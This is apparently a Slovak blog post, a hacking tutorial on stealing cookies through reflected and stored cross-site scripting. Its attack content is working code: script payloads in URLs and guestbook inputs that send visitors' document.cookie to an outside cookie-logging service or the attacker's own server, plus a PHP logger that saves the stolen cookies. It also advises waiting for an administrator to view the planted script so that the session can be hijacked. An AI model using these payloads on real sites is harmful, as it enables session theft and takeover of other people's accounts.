Cookie Stealing with non-persistent xss
No poďme hneď na vec. Ako prvé si samozrejme musíme nájsť fugu v url na dotyčnom webe. Tu máme našu:
http://www.example.sk/index.php?paper&name=<script>alert(xss);</script>toto je samozrejme ten úplne najjdenoduchší pripad využitia xss a často krát budete musieť použiť tvz. bypassy alebo zakódovať url, ale to nieje gro tohoto článku.
Môžme si nechať vypísať svoje cookies
http://www.example.sk/index.php?paper&name=<script>alert(document.cookie)</script>týmto by sme samozrejme nič nezískali, chýba nám nejaký skript ktorý by umožňoval odchytávať prichádzajúce dáta a ako už niektorí možno tušia, je to Cookie Logger . Po absolvovaní registrácie vám bude pridelené vaše ID ktoré ochvíľu použijeme v tvare:
http://ccl.whiteacid.org/log.php?598648
zeleným je vyznačené ID. Sušienky zašleme pomocou location.href a príjmeme document.cookie . Url bude teda vypadať približne takto
http://www.example.sk/index.php?paper&name=<script>location.href="http://ccl.whiteacid.org/log.php?598648"+document.cookie</script>Cookie Stealing with persistent xss
Tu je to už o niečo tažšie na uskutočnenie a veľa vecí nemusí výsť podľa vaších predstáv. Najprv si musíme nájsť nejakú návštevnú knihu/fórum/diskusiu, dačo kde by sme mohli aplikovať JavaScript.
V prvom rade si vytvoríme súbor, ktorý bude obsahovať:
<?phpsúbor uložíte napríklad ako zlodej.php, následne umiestnite na váš server a nastavte atribút 777 aby sa dalo doňho zapisavať.
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('logger.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>
Do vstupu (guestbook, diskusia, ..) vložíme približne takýto skript, ako som už povedal, je častokrát potrebné skript ušiť na mieru, preto toto berte viacmenej len ako malý ťahák.
<script>document.location="http://www.mojserver.sk/zlodej.php?cookie="+document.cookie</script>
Nuž, teraz musíme len čakať kým sa nám nejaký user alebo ešte lepšie administrátor pozrie do diskusie kde je skript vložený, akonáhle to spravý, jeho cookies sa nám odošlú na náš logger skadiaľ si ich vyzdvihneme, prepíšeme za tie naše a prihlásime sa pod stealnutými sušienkami. Takže ako vidíte, xss nieje kozmetická chyba, za ktorú ju mnoho programátorov považuje, ale naozaj ide o závažnú zraniteľnosť.
No comments:
Post a Comment